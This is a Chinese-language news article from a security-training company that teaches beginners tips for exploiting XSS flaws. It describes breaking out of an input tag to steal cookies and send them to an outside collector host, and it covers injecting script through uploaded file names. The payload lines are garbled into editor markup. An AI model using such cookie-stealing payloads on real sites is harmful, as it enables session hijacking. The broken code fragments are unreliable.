热门课程

免费试听

上课方式

开班时间

当前位置: 首页 -   文章 -   新闻动态 -   正文

零基础入门网络安全要想玩转XSS漏洞,这三个技巧你必须掌握

知了姐
2024-10-21 11:20:28
0

  零基础入门网络安全,要想玩转XSS漏洞,这三个技巧你必须掌握。

  XSS漏洞是一种网站应用程序的安全漏洞攻击,是代码注入的一种,具有获取用户的Cookie、修改页面信息、浏览器劫持等等危害。

52b64629-eff9-4530-89c2-721704984ce6.png

  XSS漏洞客户端脚本安全的头号大敌。今天知了堂教大家三个利用XSS漏洞的一些小技巧,希望对大家学习网络安全有所帮助。

  技巧一:污染标签

  简单的说,XSS漏洞的本质就是输入与输出。

  比如,QQ网名是:"你的网名">

  结果就被污染成:<input value="" data-cke-editable="1" contenteditable="false"/>

  这样就成功弹窗了,但又有什么用呢?

  可以构造语句:

  <input value="" data-cke-editable="1" contenteditable="false"/>http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22

  这样就能成功打到cookie了。

  技巧二:文件名称XSS

  有些网站有上传点,但是后台并未对文件名做更改。比如上传以后前端代码是这样的:testa>

  rar假设就是我们上传的文件。

  是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)

大家都在看

跨站脚本是什么攻击?XSS包括哪三大类型

2024-10-21 浏览次数:0

培训班出来的ui能直接工作吗?ui培训班靠谱吗

2024-10-21 浏览次数:0

喜提腾讯、网易、vivo大厂offer,最高年薪...

2024-10-21 浏览次数:0

成都网络安全培训机构哪家好一点

2024-10-21 浏览次数:0

java函数名命名规则有哪些?Java函数的命名...

2024-10-21 浏览次数:0

cisp-dsg是什么证书?适合哪些人考?

2024-10-21 浏览次数:0
最新资讯
零基础入门网络安全要想玩转XS...   零基础入门网络安全,要想玩转XSS漏洞,这三个技巧你必须掌握。  XSS漏洞是一种网站应用程序的...
零基础入门网络安全必备知识   网络安全主要是维护网络安全,维护网络安全就首先得知道是谁在破环网络安全,这是零基础入门网络安全必...
零基础入门网络安全必备知识点介...   网络安全就是指网络系统中的数据受到保护不被破坏。而我们从事网络信息安全工作的安全工程师,主要工作...
在成都如何用3个月零基础入门网... 在成都如何用3个月零基础入门网络安全?快速入门的先学习深厚的基础是必不可少的,我们一步步来。